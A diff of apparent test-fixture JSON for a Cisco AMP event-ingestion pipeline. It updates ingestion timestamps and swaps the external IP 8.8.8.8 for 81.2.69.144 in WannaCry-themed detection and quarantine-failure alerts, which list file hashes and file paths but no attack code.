@@ -180,8 +180,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:28.103719085Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":166000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419229327140847662\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:51.461470300Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":166000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419229327140847662\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", "action": "Quarantine Failure", @@ -201,7 +201,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -246,7 +246,7 @@ "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -256,8 +256,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:28.103721187Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":166000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419229327140847661\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", + "ingested": "2021-12-09T13:35:51.461478400Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":166000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419229327140847661\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "code": "2164260880", "kind": "alert", "action": "Quarantine Failure", @@ -277,7 +277,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -322,7 +322,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -332,8 +332,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:28.103723229Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":166000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419229327140847659\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225761,\"description\":\"Cannot delete\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:51.461482400Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":166000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419229327140847659\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225761,\"description\":\"Cannot delete\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", "action": "Quarantine Failure", @@ -353,7 +353,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -398,7 +398,7 @@ "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -408,8 +408,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:28.103725271Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":166000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419229327140847657\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", + "ingested": "2021-12-09T13:35:51.461487300Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":166000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419229327140847657\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "code": "2164260880", "kind": "alert", "action": "Quarantine Failure", @@ -429,7 +429,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -479,7 +479,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -496,8 +496,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:28.103727348Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":572000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229331435814973\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:51.461493200Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":572000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229331435814973\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -519,7 +519,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -576,7 +576,7 @@ "45356a9dd616ed7161a3b9192e2f318d0ab5ad10" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -593,8 +593,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:28.103729393Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":120000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419229331435814969\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"u.wnry\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\u.wnry\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\",\"sha1\":\"45356a9dd616ed7161a3b9192e2f318d0ab5ad10\",\"md5\":\"7bf2b57f2a205768755c07f238fb32cc\"},\"parent\":{\"process_id\":1008,\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}}", + "ingested": "2021-12-09T13:35:51.461499200Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":120000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419229331435814969\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"u.wnry\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\u.wnry\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\",\"sha1\":\"45356a9dd616ed7161a3b9192e2f318d0ab5ad10\",\"md5\":\"7bf2b57f2a205768755c07f238fb32cc\"},\"parent\":{\"process_id\":1008,\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -616,7 +616,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { @@ -666,7 +666,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -683,8 +683,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:28.103731430Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":73000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229331435814970\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:51.461503100Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":73000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229331435814970\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -706,7 +706,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -752,7 +752,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -769,8 +769,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:28.103733483Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":26000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419229331435814968\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:51.461507100Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":26000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419229331435814968\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -792,7 +792,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -833,7 +833,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -843,8 +843,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:28.103735553Z", - "original": 